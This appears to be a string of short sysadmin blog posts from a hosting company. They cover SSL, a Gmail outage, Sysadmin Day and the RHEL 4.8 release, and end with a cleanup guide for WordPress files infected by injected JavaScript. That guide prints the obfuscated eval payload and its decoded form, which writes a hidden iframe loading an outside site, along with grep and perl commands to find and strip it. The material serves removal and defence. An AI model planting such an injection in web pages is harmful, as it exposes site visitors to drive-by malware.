We’ll try this on our server and hopefully offer this to our shared hosting clients who wants SSL but not interested in paying extra for a dedicated ip address.

google webmail down

However mail can be retrieved and sent via IMAP/POP and SMTP. Fire up your favourite email client (I like Mozilla Thunderbird) in the meantime.

See what its all about here:

System Administrator Appreciation Day, also known as Sysadmin Day, SysAdminDay or SAAD, was created by system administrator Ted Kekatos. Kekatos was inspired to create the special day by a Hewlett-Packard magazine advertisement in which a system administrator is presented with flowers and fruit-baskets by grateful co-workers as thanks for installing new printers.

Here is one of our own getting some appreciation from our colleagues.

Max, our gets nominated as a favorite linux system administrator by some of his office fans

So don’t forget to buy your system administrator a coffee, beer, donut, or whatever he prefers, and dont ask any stupid questions tomorrow.

The system administrator song

And here is a link to another System administrator song from the UK

http://www.ukuug.org/sysadminday/

General Availability:     February 14, 2005
End of Production 1 phase:     March 31, 2009
End of Production 2 phase:     No earlier than Q4 of 2009
End of Production 3 phase:     February 29, 2012

Key features in Red Hat Enterprise Linux 4.8 include:

• Improved virtualization performance and scale
• Improved Windows interoperability and file system support
• General performance improvements
• Storage and filesystem enhancements
• Enhanced developer support

For full details check out the press release.

Note: as usual, people using Centos4 will have to wait for a couple of weeks to have cento4.8 available for upgrade.

I noticed that the affected files were PHP and HTML only and if you compare the code of the original WordPress files with the infected one you will see the difference.  Below are sample added codes/virus:

HTML files: <script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>
PHP files:  <?php echo '<script type="text/javascript">eval(String.fromCharCode(118,97...50,55))</script>'; ?>

What it does
I’m not a virus expert and I’m curios on what this portion of code does so i looked at it. In our case the resulting text add this portion of code to the html or php files:

var fggge3="si";
var w345="pl";
var re6="ank.";
var rr="com";
var a="if";
var s="tt";
document.write('<'+a+'rame src="h'+s+'p://'+fggge3+''+w345+''+re6+''+rr+'/'+'qqp/'+''+''+'" style="d'+'isplay:n'+'one">');
var t=00001217


and you can see it tries to load an iframe:

<iframe src=http://siplank.com/qqp/ style=display:none>

Virus Removal
You can remove the virus by just deleting the code (sample above) on the affected files. If you need to cleanup hundred of infected files (in our case more than 800) you can do the following:

- Get the list of infected files.  You can use grep to search for them
grep -Z -R "eval(String.fromCharCode(118,97,114" /path/to/site/* >> affected_file_list.txt
- Delete the codes by using perl/sed commands.  Repeat the commands for every files.
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  /path/to/affected/file.htm
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"  /path/to/affected/file.php

Or create a bash/shell script to do the cleanup at once:

while read line
do
perl -pi -e 's/\<script type="text\/javascript"\>eval\(String.fromCharCode\(118,97,114...51,51\)\)\<\/script\>//'  $line
perl -pi -e "s/\<\?php echo ''; \?\>\<\?php echo ''; \?\>//"   $line
done < affected_file_list.txt


That’s all.

I don’t know how the attacker gained access to the files and inserted the codes because the file permissions are ok – maybe they gain ftp access.